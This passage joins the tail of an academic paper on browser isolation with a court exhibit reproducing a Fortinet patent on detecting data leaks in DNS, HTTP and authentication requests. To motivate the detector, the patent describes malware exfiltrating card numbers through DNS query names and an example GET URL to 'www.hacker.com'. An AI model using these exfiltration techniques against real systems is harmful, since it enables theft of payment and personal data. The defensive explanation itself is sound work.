| www.soso.com | 947.1 | 983.5 | 36.4 | 3.84 | 647.4 | 672.5 | 25.1 | 3.88 |
| wordpress.com | 601.4 | 799.6 | 198.2 | 32.96 | 370 | 548.9 | 178.9 | 48.35 |
| www.sohu.com | 5601.8 | 7031 | 1429.2 | 25.51 | 4696.7 | 6596.9 | 1900.2 | 40.46 |
| www.hao123.com | 4598.4 | 4600.2 | 1.8 | 0.04 | 2276.5 | 2441.5 | 165 | 7.25 |
| www.facebook.com | 424.9 | 791.7 | 366.8 | 86.33 | 411.7 | 534.7 | 123 | 29.88 |
| **Avergage for fast sites** | 623.37 | 851.4 | **228.03** | 36.58 | 600.74 | 759.51 | **158.77** | 26.43 |
| **Average for slow sites** | 3521.44 | 4042.53 | **521.09** | 14.8 | 2517.97 | 3261.45 | **743.48** | 29.53 |
| **Overall (20 URLs)** | 1927.5 | 2287.4 | **359.9** | 18.67 | 1175.9 | 1510.1 | **334.2** | 28.42 |

**Table 1:** Performance evaluation for the tracer, times are in milliseconds

## 8. RELATED WORK

There is a vast literature on approaches to counter web attacks. We only summarize some of the most relevant works that are also representative of other works. We should also mention that private browsing modes provided by many browsers e.g. *Incognito* mode in Google Chrome, do not solve many of the problems addressed in our work. The reason for this is that they only separate browsing history and cookies from regular tabs. Moreover, there is no automatic separation of sensitive content from non-sensitive content in private browsing mode.

### *App Isolation.*

Chen et al. [5] use an approach similar to ours for browser security. They provide a mechanism inside a single browser instance to isolate web applications from each other. Their approach requires the participation of web application providers to opt in and use their method. Our approach does not require such participation and is applicable to every website. Another major difference is that our isolation technique works outside the browser and we do not modify an already-large browser code base. This makes the software product more maintainable and also more trustable because of the smaller TCB size. While the number of lines in our code base is comparable to theirs ($\approx$ 2K), their implementation depends on the Chromium's process architecture which already facilitates their job by sandboxing the rendering process and using different renderer processes for different origins when possible. If one implements their idea for another browser that does not have such process architecture (which currently includes almost all other major browsers including Firefox), it would require much more changes to be made to the browser code base.

On the other hand, their approach provides two benefits compared to our method: they can isolate web applications with finer granularity than origins, namely for sets of URLs, but in our approach we can not control the browser from outside at that level of granularity. The other benefit of their approach is its performance overhead which is negligible compared to ours.

### *Multi-Layer MAC.*

Hicks et al. [10] address the same problem with a different approach. They propose a multi-layer Mandatory Access Control (MAC) system to enforce end-to-end security goals. They implement a labeling system to achieve separation of data with different sensitivity. Their method requires collaboration from both client and server and also requires a modified browser to handle labeling and MAC enforcement. While their system is quite complicated, it can provide isolation at various levels of granularity. We argue that our proposed system is more practical because of its simplicity and small size while providing a coarse grained isolation of sensitive data.

### *FlowFox.*

De Groef et al. [6] proposed an information-flow control scheme based on secure multi-execution technique [7]. They modified SpiderMonkey, the JavaScript engine used in FireFox and other browsers, to enforce information flow security policies. Their threat model is limited to information leakage, which is significantly weaker than the threat model we consider. Their approach is also different. Their solution works at the browser abstraction level while

our solution works at the operating system abstraction level. We argue that our approach is more flexible and more trustable because we do not introduce any code in the browser code-base. Web browsers have typically very large code-bases, and adding to this complex code might create more vulnerabilities. Also, operating system abstractions are more stable and have much less complexity compared to browser's internal abstractions.

*Shadow Execution.*

Capizzi et al. [4] addressed the information leakage problem in the context of desktop applications. Desktop applications might connect to network to get the latest updates for example. Since such applications normally run with user privileges, they have access to user's sensitive information and they might leak this information. The authors propose a technique called shadow execution in which they run two instances of the same application, one with access to user private data but no network access and another instance with no access to real user data but able to access the network. As our method, their method works at the operating system abstraction level, but their method is not suitable for controlling browsers.

## 9. CONCLUSION

We have shown that it is possible to provide effective protection against active and passive attacks on web browsers. Unlike other approaches, we manage to have a browser-independent mechanism to provide the required execution isolation needed to access different kinds of content. The overhead of the approach, while being acceptable, is not ideal and more work is need to further reduce the overhead.

## 10. ACKNOWLEDGMENTS

We would like to thank the reviewers for many useful comments. This work has been supported in part through National Science Foundation grant CSR-0849980. The views and findings of this paper do not necessarily reflect those of NSF.

## 11. REFERENCES

[1] A. Barth, C. Jackson, and J. C. Mitchell. Robust defenses for cross-site request forgery. In *Proceedings of the 2008 ACM conference on Computer and Communications Security*, CCS'08, pages 75–88, 2008.

[2] N. Bielova, D. Devriese, F. Massacci, and F. Piessens. Reactive non-interference for a browser model. In *Proceedings of the 2011 international conference on Network and System Security*, NSS'11, pages 97–104, 2011.

[3] D. F. C. Brewer and M. J. Nash. The chinese wall security policy. In *Security and Privacy, 1989. Proceedings., 1989 IEEE Symposium on*, pages 206–214. IEEE, 1989.

[4] R. Capizzi, A. Longo, V. N. Venkatakrishnan, and A. P. Sistla. Preventing information leaks through shadow executions. In *Annual Computer Security Applications Conference, 2008*, ACSAC'08, pages 322–331, 2008.

[5] E. Y. Chen, J. Bau, C. Reis, A. Barth, and C. Jackson. App isolation: get the security of multiple browsers with just one. In *Proceedings of the 18th ACM conference on Computer and communications security*, CCS '11, pages 227–238, 2011.

[6] W. De Groef, D. Devriese, N. Nikiforakis, and F. Piessens. Flowfox: a web browser with flexible and precise information flow control. In *Proceedings of the 2012 ACM conference on Computer and Communications Security*, CCS'12, pages 748–759, 2012.

[7] D. Devriese and F. Piessens. Noninterference through secure multi-execution. In *Proceedings of the 2010 IEEE Symposium on Security and Privacy*, SP'10, pages 109–124, 2010.

[8] D. Flanagan. *JavaScript: the definitive guide*. O'Reilly Media, 2011.

[9] T. Garfinkel. Traps and pitfalls: Practical problems in system call interposition based security tools. In *Proceedings of the 2003 Network and Distributed Systems Security Symposium*, volume 33 of *NDSS'03*, 2003.

[10] B. Hicks, S. Rueda, D. King, T. Moyer, J. Schiffman, Y. Sreenivasan, P. McDaniel, and T. Jaeger. An architecture for enforcing end-to-end access control over web applications. In *Proceedings of the 15th ACM symposium on Access control models and technologies*, SACMAT'10, pages 163–172, 2010.

[11] Internet Engineering Task Force (IETF). Request for Comments: 6265.

[12] Internet Engineering Task Force (IETF). Request for Comments: 6454, 2011.

[13] C. Jackson, A. Barth, A. Bortz, W. Shao, and D. Boneh. Protecting browsers from dns rebinding attacks. *ACM Transactions on the Web (TWEB)*, 3(1):2, 2009.

[14] D. Jang, R. Jhala, S. Lerner, and H. Shacham. An empirical study of privacy-violating information flows in javascript web applications. In *Proceedings of the 2010 ACM conference on Computer and Communications Security*, CCS'10, pages 270–283, 2010.

[15] M. Johns. On javascript malware and related threats. *Journal in Computer Virology*, 4(3):161–178, 2008.

[16] E. Kirda and C. Kruegel. Protecting users against phishing attacks. *The Computer Journal*, 49(5):554–561, 2006.

[17] N. Provos, P. Mavrommatis, M. A. Rajab, and F. Monrose. All your iframes point to us. In *Proceedings of the 2008 Security Symposium*, SS'08, pages 1–15, 2008.

[18] G. Rydstedt, E. Bursztein, D. Boneh, and C. Jackson. Busting frame busting: a study of clickjacking vulnerabilities at popular sites. *IEEE Oakland Web*, 2, 2010.

[19] Z. Weinberg, E. Y. Chen, P. R. Jayaraman, and C. Jackson. I still know what you visited last summer: Leaking browsing history via user interaction and side channel attacks. In *Proceedings of the 2011 IEEE Symposium on Security and Privacy*, SP'11, pages 147–161, 2011.

# APPENDIX E

Case 2:25-cv-00098-JRG Document 67-3 Filed 03/31/26 Page 166 of 433 PageID #: 7476

US009197628B1

(12) **United States Patent**
**Hastings**

(10) **Patent No.: US 9,197,628 B1**
(45) **Date of Patent: Nov. 24, 2015**

(54) **DATA LEAK PROTECTION IN UPPER LAYER PROTOCOLS**

(71) Applicant: **Fortinet, Inc.**, Sunnyvale, CA (US)

(72) Inventor: **Eric C. Hastings**, Austin, TX (US)

(73) Assignee: **Fortinet, Inc.**, Sunnyvale, CA (US)

( * ) Notice: Subject to any disclaimer, the term of this patent is extended or adjusted under 35 U.S.C. 154(b) by 0 days.

(21) Appl. No.: **14/657,735**

(22) Filed: **Mar. 13, 2015**

**Related U.S. Application Data**

(63) Continuation of application No. 14/482,986, filed on Sep. 10, 2014.

(51) **Int. Cl.**
***H04L 29/06*** (2006.01)

(52) **U.S. Cl.**
CPC ............. ***H04L 63/08*** (2013.01); *H04L 63/1408* (2013.01)

(58) **Field of Classification Search**
CPC ............................ H04L 63/08; H04L 63/1408
USPC ...................................... 713/153; 726/11, 23
See application file for complete search history.

(56) **References Cited**

U.S. PATENT DOCUMENTS

6,754,212 B1 * 6/2004 Terada ................ H04L 63/0218 370/389
8,429,751 B2 * 4/2013 Mizrahi ............. H04L 63/1416 709/223
2001/0039624 A1 * 11/2001 Kellum ................. G06F 21/567 726/24
2002/0013911 A1 * 1/2002 Cordella .............. G06F 21/567 726/11
2002/0128981 A1 * 9/2002 Kawan .................. G06Q 20/02 705/67
2004/0019564 A1 * 1/2004 Goldthwaite .......... G06Q 20/04 705/44
2006/0013211 A1 * 1/2006 Deerman .......... H04L 29/12009 370/389
2006/0179040 A1 * 8/2006 Bird .................. G06F 17/30306
2006/0272009 A1 * 11/2006 Stott ................. H04L 29/06027 726/3
2009/0248696 A1 * 10/2009 Rowles ................ G06F 21/552
2009/0249484 A1 * 10/2009 Howard ................ G06F 21/567 726/24
2010/0199345 A1 * 8/2010 Nadir ...................... H04L 63/02 726/11
2010/0306816 A1 * 12/2010 McGrew ............. H04L 63/1408 726/1
2012/0180120 A1 * 7/2012 Jain ..................... H04L 63/0245 726/11
2013/0086379 A1 * 4/2013 Shimizu ............. H04L 63/0485 713/160
2013/0298222 A1 * 11/2013 Zuk ..................... H04L 63/0227 726/13
2013/0347085 A1 * 12/2013 Hawthorn ............... G06F 21/00 726/6

OTHER PUBLICATIONS

Fors et al., "An Implementation of a DNS-based Malware Detection System." Nov. 2010. Karlstads University. pp. 1-35.
Non-Final Rejection for U.S. Appl. No. 14/482,986 mailed Nov. 14, 2014.
U.S. Appl. No. 14/482,986, filed Sep. 10, 2014.
Notice of Allowance for U.S. Appl. No. 14/482,986, filed Jul. 7, 2015.

* cited by examiner

*Primary Examiner* — Dao Ho
(74) *Attorney, Agent, or Firm* — Hamilton, DeSanctis & Cha LLP

(57) **ABSTRACT**

Methods and systems for Data Leak Prevention (DLP) in a private network are provided. According to one embodiment, information is received from an administrator (i) defining a DLP rule to be applied to packets associated with an upper layer protocol and (ii) defining an action to take when a condition associated with the rule is satisfied. The rule includes a regular expression and/or a string that is configured to detect existence of sensitive information. A packet originated by a host device is received. The packet is determined to be associated with the upper layer protocol. A command, request or method of the protocol is identified that is specified by or represented by the packet. The packet is scanned for sensitive information based on the rule. When the scanning results in a conclusion that sensitive information is contained within the packet, then the defined action is performed.

**14 Claims, 6 Drawing Sheets**




Mobile Phone
124
PC 123
Branch Office
Network 122
Branch Office
Network 121
Internet
130
Private Network 110
Gateway 112
Mobile
Phone
111d
Laptop
111c
PC
111b
Local Server
111a

FIG. 1


Gateway 112
DLP Engine 210
Firewall Module 208
Router 206
Local Interface module 202
External Communication Module 204

FIG. 2


DLP Engine 210
Protocol Decoder 301
Request Decoder 302
Field Extractor 303
Sensitive Info filter 304
Action module 305
Sensors 306

FIG. 3


Start
401
Intercept a data packet
402
Decode an upper layer protocol of the data packet
403
Does the protocol need DLP scan
N
Y
404
Decode a request or a command of the upper layer protocol
405
request should be checked?
N
Y
406
N
Field should be extracted?
407
Y
Extract a field from the request
408
Does the field contain sensetive info?
N
409
410
Y
Pass the data packet through the gateway
Take an action to the data packet
End

FIG. 4


Start
501
Receive a DNS query message
502
Extract a domain name field from the message
503
Does the
Domain name field contains any
sensetive info?
504
Take an action to the DNS query
message based on a matched rule
505
Pass the DNS query message
through gateway
End

FIG. 5


600
Mass Storage Device 625
Read-Only Memory 620
Main Memory 615
Bus 630
Processor 605
Communication Port(s) 610
External Storage Device 640

FIG. 6

# DATA LEAK PROTECTION IN UPPER LAYER PROTOCOLS

## CROSS-REFERENCE TO RELATED APPLICATIONS

This application is a continuation of U.S. patent application Ser. No. 14/482,986, filed Sep. 10, 2014, which is hereby incorporated by reference in its entirety for all purposes.

## COPYRIGHT NOTICE

Contained herein is material that is subject to copyright protection. The copyright owner has no objection to the facsimile reproduction of the patent disclosure by any person as it appears in the Patent and Trademark Office patent files or records, but otherwise reserves all rights to the copyright whatsoever. Copyright © 2014-2015, Fortinet, Inc.

## BACKGROUND

1. Field

Embodiments of the present invention generally relate to the field of Internet communications. In particular, various embodiments relate to method and systems for data leak protection in upper layer protocols.

2. Description of the Related Art

The digitization of information stored in an organization, such as an enterprise, has increased over the years. In addition, the distribution of content via networks has also begun to grow through information infrastructures such as the Internet. The Internet speeds the communication process; however it also makes it much easier to intentionally or accidentally send corporate/personal confidential documents and/or sensitive information to an unauthorized receiver. To prevent data leak, a firewall may be deployed at a border of a private network. Multiple sensors may be configured by a network administrator of the network for defining formats of sensitive information, including, but not limited to, credit card numbers, social security numbers (SSNs), IP addresses, user names/passwords. The firewall may catch a file or a message that is sent out of the private network and then detect if the file or message contains any text that matches the formats defined by the sensors. If the file or message contains any sensitive information, the firewall may take an action defined in the sensors, such as block the message/file from transmission to its destination.

A firewall may check files or messages that are transferred via some email transfer protocols or file transfer protocols, such as post office protocol (POP), simple mail transfer protocol (SMTP), instant message access protocol (IMAP), file transfer protocol (FTP) and the like. However, when malicious software (malware), e.g., viruses, spyware, worms, trojans, rootkits, keyloggers and the like, has stolen sensitive information, e.g., credit card numbers, from a Point of Sale (POS) terminal/server, for example, such malware could use a request, command or method of an upper layer protocol that is not intended to be used to transfer messages and/or files to send the data to a hacker. For example, if malware has stolen a credit card number 8888 8888 8888 0001. The malware may send a crafted domain name system (DNS) query with "8888888888880001.com" encoded within the QNAME field of the DNS question portion of the DNS packet to a compromised DNS server. The compromised DNS server may then parse the credit card number from the DNS query and send it to the hacker.



DNS uses User Datagram Protocol (UDP) or Transmission Control Protocol (TCP) as the protocol transport to serve requests clients and issue replies. Because existing Data Leak Prevention (DLP) engines usually check only messages or files that are transferred out of a private network via specific protocols (e.g., message or file transfer protocols), the exemplary DNS query presented above, containing encoded information regarding a credit card number, will not trigger traditional DLP checking. Another way that malware may transfer the same credit card number without trigger a DLP check is by sending a hypertext transfer protocol (HTTP) GET request (HTTP://www.hacker.com/8888888888880001) to a compromised web server. The logs of the web server would then contain a record evidencing a request to access that Universal Resource Locator (URL) even though it doesn't exist. This allows hackers to bypass corporate DLP systems and gather sensitive information. A further way to bypass prior art DLP systems is by using an authentication process of an upper layer protocol. Malware may send an authentication request of an upper layer protocol and use the credit card number as a user name or password to a compromised server. The server on the other end may then log the credit card numbers that were used as usernames or passwords.

In general, malware may send sensitive information through requests, commands and/or methods of upper layer protocols that are not intended to be used to transfer messages and/or files to compromised servers. As such requests, commands and/or methods are usually used for setting up a connection with a server before a session is actually created or carrying out operations on the server side, for example, such requests, commands or/or methods will not trigger traditional DLP checking and therefore represent a risk for leaking sensitive information.

## SUMMARY

Methods and systems are described for Data Leak Prevention (DLP) in a private network. According to one embodiment, a DLP method is performed by a network security appliance. Information is received from a network administrator defining a DLP rule to be applied to packets associated with an upper layer protocol and defining an action to take when one or more conditions associated with the DLP rule are satisfied. The DLP rule is defined in terms of a regular expression and/or a string that are configured to detect existence of one or more forms of sensitive information carried by the packets. A packet originated by a host device within the private network and directed to a destination device outside of the private network is received. The received packet is determined to be associated with the upper layer protocol. A command, request or method of the upper layer protocol is identified that is specified by or represented by the received packet. The received packet is scanned for sensitive information by applying the DLP rule to one or more fields of the command, request or method. The command, request or method is not designed or intended to carry data or information in a form of a message or file to a target of the command, request or method. When the scanning results in a conclusion that the sensitive information is contained within the received packet, then the defined action is performed.

Other features of embodiments of the present invention will be apparent from the accompanying drawings and from the detailed description that follows.

## BRIEF DESCRIPTION OF THE DRAWINGS

Embodiments of the present invention are illustrated by way of example, and not by way of limitation, in the figures of

the accompanying drawings and in which like reference numerals refer to similar elements and in which:

FIG. **1** is a block diagram illustrating a private network in which embodiments of the present invention may be employed.

FIG. **2** is a block diagram conceptually illustrating interaction among various functional units of a gateway in accordance with an embodiment of the present invention.

FIG. **3** is a block diagram conceptually illustrating interaction among various functional units of a DLP engine in accordance with an embodiment of the present invention.

FIG. **4** is a flow diagram illustrating a method for DLP in a private network in accordance with an embodiment of the present invention.

FIG. **5** is a flow diagram illustrating a method for DLP in a private network in accordance with another embodiment of the present invention.

FIG. **6** is an exemplary computer system with which embodiments of the present invention may be utilized.

## DETAILED DESCRIPTION

Methods and systems are described for Data Leak Prevention (DLP) in a private network. To prevent accidental or intentional dissemination of confidential or sensitive documents and/or information to unauthorized users, it is desirable to have a DLP system that allows the transmission of such documents or information only to authorized personnel.

In the following description, numerous specific details are set forth in order to provide a thorough understanding of embodiments of the present invention. It will be apparent, however, to one skilled in the art that embodiments of the present invention may be practiced without some of these specific details. In other instances, well-known structures and devices are shown in block diagram form.

The steps may be performed by hardware components or may be embodied in machine-executable instructions, which may be used to cause a general purpose or special-purpose processor programmed with the instructions to perform the steps. Alternatively, the steps may be performed by a combination of hardware, software, firmware and/or by human operators.

Embodiments of the present invention may be provided as a computer program product, which may include a machine-readable storage medium tangibly embodying thereon instructions, which may be used to program a computer (or other electronic devices) to perform a process. The machine-readable medium may include, but is not limited to, fixed (hard) drives, magnetic tape, floppy diskettes, optical disks, compact disc read-only memories (CD-ROMs), and magneto-optical disks, semiconductor memories, such as ROMs, PROMs, random access memories (RAMs), programmable read-only memories (PROMs), erasable PROMs (EPROMs), electrically erasable PROMs (EEPROMs), flash memory, magnetic or optical cards, or other type of media/machine-readable medium suitable for storing electronic instructions (e.g., computer programming code, such as software or firmware). Moreover, embodiments of the present invention may also be downloaded as one or more computer program products, wherein the program may be transferred from a remote computer to a requesting computer by way of data signals embodied in a carrier wave or other propagation medium via a communication link (e.g., a modem or network connection).

In various embodiments, the article(s) of manufacture (e.g., the computer program products) containing the computer programming code may be used by executing the code directly from the machine-readable storage medium or by copying the code from the machine-readable storage medium into another machine-readable storage medium (e.g., a hard disk, RAM, etc.) or by transmitting the code on a network for remote execution. Various methods described herein may be practiced by combining one or more machine-readable storage media containing the code according to the present invention with appropriate standard computer hardware to execute the code contained therein. An apparatus for practicing various embodiments of the present invention may involve one or more computers (or one or more processors within a single computer) and storage systems containing or having network access to computer program(s) coded in accordance with various methods described herein, and the method steps of the invention could be accomplished by modules, routines, subroutines, or subparts of a computer program product.



While for sake of illustration embodiments of the present invention are described with reference to networking devices (e.g., switching devices, gateway devices and firewall security devices) available from the assignee of the present invention, it is to be understood that the methods and systems of the present invention are equally applicable to networking devices manufactured by others, including, but not limited to, Barracuda Networks, Brocade Communications Systems, Inc., CheckPoint Software Technologies Ltd., Cisco Systems, Inc., Citrix Systems, Inc., Imperva Inc., Juniper Networks, Inc., Nokia, Palo Alto Networks, SonicWall, Inc. and Syntensia AB.

## TERMINOLOGY

Brief definitions of terms used throughout this application are given below.

The term “client” generally refers to an application, program, process or device in a client/server relationship that requests information or services from another program, process or device (a server) on a network. Importantly, the terms “client” and “server” are relative since an application may be a client to one application but a server to another. The term “client” also encompasses software that makes the connection between a requesting application, program, process or device to a server possible, such as an FTP client.

The terms “connected” or “coupled” and related terms are used in an operational sense and are not necessarily limited to a direct connection or coupling. Thus, for example, two devices may be coupled directly, or via one or more intermediary media or devices. As another example, devices may be coupled in such a way that information can be passed there between, while not sharing any physical connection with one another. Based on the disclosure provided herein, one of ordinary skill in the art will appreciate a variety of ways in which connection or coupling exists in accordance with the aforementioned definition.

The phrases “in one embodiment,” “according to one embodiment,” “and the like” generally mean the particular feature, structure, or characteristic following the phrase is included in at least one embodiment of the present invention, and may be included in more than one embodiment of the present invention. Importantly, such phrases do not necessarily refer to the same embodiment.

The phrase “network security appliance” generally refers to a specialized or dedicated device for use on a network in virtual or physical form that is intended to protect a network from propagating unwanted traffic or leaking sensitive information, for example. Some network security appliances are implemented as general-purpose computers with appropriate software configured for the particular functions to be provided by the network appliance; others include custom hard-

ware (e.g., one or more custom Application Specific Integrated Circuits (ASICs)). Examples of functionality that may be provided by a network security appliance include, but are not limited to, Layer 2/3 routing, content inspection, content filtering, firewall, traffic shaping, application control, Voice over Internet Protocol (VoIP) support, Virtual Private Networking (VPN), IP security (IPSec), Secure Sockets Layer (SSL), antivirus, intrusion detection, intrusion prevention, Web content filtering, spyware prevention and anti-spam. Examples of network security appliances include, but are not limited to, active devices that block unwanted traffic, including, but not limited to, firewalls, antivirus scanning devices and content filtering devices, passive devices that detect and report on unwanted traffic, including, but not limited to intrusion detection appliances, prevention devices that scan networks and identify potential security problems, including, but not limited to penetration testing and vulnerability assessment appliances and Unified Threat Management (UTM) appliances that combine features together into one system, including, firewalls, content filtering, web caching and the like. Specific examples of network appliances and network security appliances provided by the assignee include, but are not limited to network gateways (e.g., the FORTIGATE family of network security appliances and the FORTICARRIER family of consolidated security appliances), messaging security appliances (e.g., the FORTIMAIL family of messaging security appliances), database security and/or compliance appliances (e.g., the FORTIDB database security and compliance appliance), web application firewall appliances (e.g., the FORTIWEB family of web application firewall appliances), application acceleration appliances, server load balancing appliances (e.g., the FORTIBALANCER family of application delivery controllers), vulnerability management appliances (e.g., the FORTISCAN family of vulnerability management appliances), configuration, provisioning, update and/or management appliances (e.g., the FORTIMANAGER family of management appliances), logging, analyzing and/or reporting appliances (e.g., the FORTIANALYZER family of network security reporting appliances), bypass appliances (e.g., the FORTIBRIDGE family of bypass appliances), Domain Name Server (DNS) appliances (e.g., the FORTIDNS family of DNS appliances), wireless security appliances (e.g., the FORTIWIFI family of wireless security gateways), distributed denial of service (DDoS) protection appliances (e.g., the FORTIDDOS family of DDoS prevention appliances), wireless access point appliances (e.g., the FORTIAP wireless access points), switches (e.g., the FORTISWITCH family of switches) and IP-PBX phone system appliances (e.g., the FORTIVOICE family of IP-PBX phone systems).

If the specification states a component or feature “may”, “can”, “could”, or “might” be included or have a characteristic, that particular component or feature is not required to be included or have the characteristic.

The term “server” generally refers to an application, program, process or device in a client/server relationship that responds to requests for information or services by another program, process or device (a server) on a network. The term “server” also encompasses software that makes the act of serving information or providing services possible.

The phrase “upper layer protocol” generally refers to any protocol residing in Open System Interconnection (OSI) layers five or above (e.g., the Session Layer, Presentation Layer and Application Layer). Upper layer protocols of concern in the context of the present disclosure are those that include requests, commands and/or methods not specifically designed to be used to transfer messages and/or files and which are therefore not inspected by existing DLP solutions. Such requests, commands and/or methods of upper layer protocols of concern can be misused to leak confidential or sensitive information and include, but are not limited to, requests, commands and/or methods of DNS, HTTP, FTP, Telnet, Session Initiation Protocol (SIP). Additionally, authentication requests/commands of various upper layer protocols may be misused to bypass current DLP solutions.

FIG. **1** illustrates an exemplary network architecture **100** in accordance with an embodiment of the present invention. In the context of the present example, network architecture **100** comprises a private network **110**, multiple branch office networks **121** and **122**. Private network **110** and branch office networks **121** and **122**, PC **123** and mobile phone **124** are connected through internetworks, such as the Internet **130**. Private network **110** includes multiple network appliances, such as local server **111***a*, PC **111***b*, laptop **111***c*, mobile phone **111***d* and other computing devices that are operatively coupled to each other through a Local Area Network (LAN), wherein the LAN is then operatively coupled with gateway **112** which enables access to Internet **130**. Gateway **112** separates the external computing environment, represented by Internet **130**, from the internal computing environment of private network **110**. Gateway **112** may intercept communications between Internet **130** and the network appliances of private network **110** and scan for malware, viruses or other high risk network accesses. The internal structures of branch office networks **121** and **122** are omitted as they may be the same as that of private network **110**.

In the embodiment shown in FIG. **1**, gateway **112** is an exemplary network security appliance in the form of a rule-based network security device that controls traffic going through its interfaces. Usually, gateway **112** includes multiple physical network interfaces, such as an internal interface with 4-24 or more Ethernet ports, 1-4 or more wide area network (WAN) interfaces and one demilitarized zone (DMZ) interface. Further, when the private network is separated into multiple virtual LANs (VLANs), gateway **112** may also define multiple virtual interfaces for each of the VLANs.

Gateway **112** includes a rule set with multiple rules created by the network administrator and controls the traffic going through gateway **112**. In the context of each rule, traffic is typically identified by source interfaces, destination interfaces, source Internet Protocol (IP) addresses, destination IP addresses, users/user groups, devices and other parameters of the traffic. In one embodiment of the present invention, multiple interfaces of gateway **112** may be selected as the source/destination of traffic in a single rule. The multiple interfaces can include physical interfaces, virtual interfaces or zones of gateway **112**. Usually, multiple interfaces that belong to the same category may be selected as a source in a rule. For example, multiple VLAN interfaces may be selected as sources/destinations of the traffic in a rule. However, different categories of interfaces may also be allowed as sources/destinations of a traffic flow in a rule. For example, an internal interface and a WAN interface or a physical interface and a virtual interface may be selected in a rule as the sources/destinations of traffic. In this scenario, a warning message may be provided to the network administrator before the rule containing multiple categories of interfaces can be stored within gateway **112**. After the traffic flow is defined, an action controlling the traffic flow, such as accept or deny, is designated in each rule. In operation, all traffic going through interfaces of gateway **112** is captured by gateway **112**. The source interface, destination interface and other parameters of the captured traffic flow are matched with those of each rule of a rule set. The first matched rule in the rule set is typically

used for controlling the traffic flow and the traffic flow is processed based on the action defined in the matched rule.

In addition to traffic rules, the network administrator of gateway **112** may also configure DLP sensors at the gateway **104**. The DLP sensors are modules that are capable of detecting sensitive information contained in requests or commands of upper layer protocols. The network administrator may log into the gateway **112** and configure the DLP sensors to detect particular requests or commands and responsive to the detection perform specified actions. The actions may include either blocking or passing the requests/commands at the gateway **112**, when the requests/commands containing the particular sensitive information are received by (attempted to be transferred through) the gateway **112**.

In an exemplary embodiment of the present invention, gateway **112** may be a FORTIGATE gateway available from Fortinet, Inc. of Sunnyvale, Calif. (FORTIGATE is a trademark or registered trademark of Fortinet, Inc.).

FIG. **2** is a block diagram conceptually illustrating interaction among various functional units of gateway **112**, in accordance with an embodiment of the present invention. In the context of the present example, gateway **112** includes a local interface module **202**, an external communications module **204**, a router **206**, a firewall module **208** and a DLP engine **210**.

According to one embodiment, local interface module **202** provides a physical and data-link layer communication interface with one or more computer systems, such as computer systems **111***a-d*. Local interface module **202** accepts and provides IP packets over an internal data path and interfaces with the network link. External interface module **204** accepts and provides IP packets over data paths from and to other modules in gateway **112**, and provides physical and data-link layer interfaces to a communication link that couples gateway **112** to the external network.

Further, external communication module **204** is coupled to router **206**. Router **206** accepts IP packet from a number of data paths within gateway **112**, and routes those packets to other data paths. For example, router **206** accepts IP packets over a data path from local interface module **202**. Furthermore, router **206** is connected to firewall module **208**. Firewall module **208** adds a level of protection between computer systems **111***a-d*, and permits or denies network transmissions based upon a set of rules. The rules are run and the outcome is then communicated by firewall module **208** to external communications module **204** and an action is taken accordingly.

Gateway **112** further comprises a DLP engine **210**. In an embodiment, DLP engine **210** is capable of detecting sensitive information in requests/commands of upper layer protocols that are not scanned by existing DLP solutions. DLP engine **210** detects sensitive information (e.g., payment card numbers, usernames/passwords, IP addresses, or particular words/phrases) contained in a request or a command of an upper layer protocol that a client intends to send out of the network. In another embodiment, DLP engine **210** is capable of analyzing a particular field of a request that a client intends to send out of the network. In addition to analyzing/scanning upper layer protocols of particular concern or those specifically configured by the network administrator, DLP engine **210** may also analyze/scan network traffic, such as customarily analyzed/scanned by existing DLP solutions.

According to an embodiment, DLP engine **210** includes a package of DLP rules or sensors. Traffic passing through gateway **112** is searched for patterns defined by the DLP sensors (rules). Based on the matching and how the DLP rules are defined, an appropriate action may be taken on the traffic, such as blocking the traffic at gateway **112**, allowing the traffic to pass through gateway **112**, logging the traffic and/or the like.

According to various embodiments of the present invention, the functional modules can be any suitable type of logic (e.g., digital logic) for executing the operations described herein. Any of the functional modules used in conjunction with embodiments of the present invention can include machine-readable media including instructions for performing operations described herein. Machine-readable media include any mechanism that provides (i.e., stores and/or transmits) information in a form readable by a machine (e.g., a computer). For example, a machine-readable medium includes read only memory (ROM), random access memory (RAM), magnetic disk storage media, optical storage media, flash memory devices, electrical, optical, acoustical or other forms of propagated signals (e.g., carrier waves, infrared signals, digital signals, etc.), etc.

FIG. **3** is a block diagram conceptually illustrating interactions among various functional units of a DLP engine **210** in accordance with an embodiment of the present invention. In the present embodiment, DLP engine **210** may identify an upper layer protocol used by a data packet that is intended to be sent out of a private network. DLP engine **210** may further identify a request or a command of the upper layer protocol that a client intends to send to a server. If a field of the request or command has enough space for transmission of sensitive information, DLP engine **210** will be triggered to scan for sensitive information contained within the request or the field although the request, command or method at issue may not have been specifically designed or intended for transferring, uploading or otherwise conveying a message or a file.

In the context of the present example, DLP engine **210** includes a protocol decoder **301**, a request decoder **302**, a field extractor **303**, a sensitive information filter **304**, an action module **305** and sensors **306**. After a data packet that a client intends to send out of a private network is received by a gateway, such as gateway **112**, the data packet is then sent to DLP engine **210** for data leak scanning/analysis.

The data packet is analyzed by protocol decoder **301** to identify an upper layer protocol with which the data packet is associated. In one embodiment, the upper layer protocol may include any protocol residing in OSI layers five or above. The protocol of the data packet may be determined by the destination port of the data packet. For example, if the destination port is 53, the upper layer protocol of the data packet may be determined to be the DNS protocol. If the destination port is 21, the upper layer protocol of the data packet may be determined to be FTP.

Next, request decoder **302** further determines a request or a command of the upper layer protocol specified by the data packet based on the previous identification of the upper layer protocol. Generally, each upper layer protocol includes a set of request/response messages that are exchanged between a client and a server. Some requests or commands of protocols that are associated with electronic mail (email)/file/instant message transmissions are currently checked by prior art DLP systems. However, other requests or commands of upper layer protocols that contain one or more parameters that are used for operations other than transferring messages or files may be utilized by malware to transfer sensitive information to a compromised server. For example, a DNS query that contains a payment card number may be sent by malware to a compromised DNS server. The compromised server may parse the DNS query and collect the payment card number. In

this manner, a hacker that controls the DNS server may bypass traditional scanning by existing DLP systems and gather the payment card number through a DNS query which looks like a normal query, but encodes a payment card number within one or more fields of a DNS protocol command, request or method.

Another example of a request that may be used to carry sensitive information is an authentication request sent from a client to a compromised server. Many upper layer protocols have a user authentication procedure before a session may be established between a client and a server. During such user authentication procedures, a user-id and password may be sent by a client through an authentication request defined in an upper layer protocol. The malware may send a crafted authentication request to a server, wherein the user-id or password field of the authentication request contains a payment card number, for example. After the compromised server receives the crafted authentication request, the authentication request may be logged by the server regardless of whether it is accepted. Then, the payment card number may be parsed from the log by the hacker who controls the server. In this scenario, the hacker may transfer the sensitive information without establishing a session or connection between the client and server.

